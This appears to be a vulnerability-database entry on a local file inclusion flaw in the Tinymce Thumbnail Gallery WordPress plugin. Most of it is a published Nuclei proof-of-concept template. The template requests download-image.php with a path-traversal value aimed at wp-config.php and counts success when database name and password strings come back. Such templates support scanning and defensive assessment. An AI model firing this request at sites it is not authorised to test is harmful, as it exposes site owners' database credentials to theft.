wp-tinymce-lfi: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Tinymce Thumbnail Gallery | POC: 已公开

漏洞描述

Tinymce Thumbnail Gallery 1.0.7 and before are vulnerable to local file inclusion via download-image.php.

PoC代码[已公开]

id: wp-tinymce-lfi

info:
  name: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Tinymce Thumbnail Gallery 1.0.7 and before are vulnerable to local file inclusion via download-image.php.
  reference:
    - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
    - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wpscan,wordpress,wp-theme,lfi,tinymce,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bb31e0910733198f6ecf63c327b216b73eb7b1686144d30761df4a87c6ec0d200220381947a025d6f293191542b85f1d57a12738daa062ce1c5679f305af9e8671cc:922c64590222798bb761d5b6d8e72950

相关漏洞推荐